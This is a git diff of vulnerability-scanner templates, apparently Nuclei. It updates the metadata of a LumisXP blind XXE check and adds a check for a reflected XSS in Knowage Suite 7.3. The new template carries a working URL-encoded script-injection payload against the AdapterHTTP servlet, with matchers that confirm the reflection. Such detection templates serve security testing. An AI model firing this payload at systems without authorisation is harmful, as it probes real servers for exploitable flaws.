Merge branch 'master' into pr-fix

cves/2021/CVE-2021-27931.yaml

@@ -3,11 +3,16 @@ id: CVE-2021-27931
 info:
   name: LumisXP Blind XXE
   author: alph4byt3
-  severity: high
+  severity: critical
   description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.
   reference:
     - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt
     - https://nvd.nist.gov/vuln/detail/CVE-2021-27931
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
+    cvss-score: 9.10
+    cve-id: CVE-2021-27931
+    cwe-id: CWE-611
   tags: cve,cve2021,lumis,xxe,oast
 
 requests:

cves/2021/CVE-2021-30213.yaml

@@ -0,0 +1,36 @@
+id: CVE-2021-30213
+
+info:
+  name: Knowage Suite 7.3 XSS
+  author: alph4byt3
+  severity: medium
+  description: Knowage Suite 7.3 is vulnerable to unauthenticated reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
+    
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2021-30213
+  tags: cve,cve2021,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-30213
+    cwe-id: CWE-79
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"><script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - text/html